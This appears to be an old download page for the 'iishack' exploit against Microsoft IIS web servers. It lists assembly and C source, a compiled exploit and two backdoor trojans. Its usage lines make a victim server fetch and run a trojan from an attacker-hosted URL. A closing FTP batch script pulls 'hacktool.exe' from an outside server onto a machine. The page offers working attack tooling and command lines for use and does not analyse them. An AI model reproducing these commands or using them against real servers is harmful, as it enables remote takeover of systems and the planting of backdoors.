Here, you will find out why Windows may be the desktop of choice, but SHOULD NOT BE USED AS A SERVER. |
Win32 (assembly) Source code: | iishack.asm | 12,523 bytes | [674] |
Unix (c) Source code: | iishack.c | 9,935 bytes | [516] |
Exploit program: | iishack.exe | 3,526 bytes | [2151] |
Trojan (port 80): | ncx.exe | 31,744 bytes | [1593] |
Trojan (port 99): | ncx99.exe | 59,392 bytes | [1321] |
iishack www.example.com 80 www.myhomepage.com/mydirectory/ncx.exeThis will connect to www.example.com at port 80, and send the attack. The victim server will then download http://www.myhomepage.com/mydirectory/ncx.exe and run it.
(c) dark spyrit --
[email protected]. http://www.eEye.com [usage: iishack <host> <port> <url>] eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe do not include 'http://' before hosts! |
C:\> echo anonymous >
myscript.txt C:\> echo [email protected] >> myscript.txt C:\> echo cd pub >> myscript.txt C:\> echo binary >> myscript.txt C:\> echo get hacktool.exe >> myscript.txt C:\> echo bye >> myscript.txt C:\> ftp -s:myscript.txt ftp.myserver.com C:\> del myscript.txt |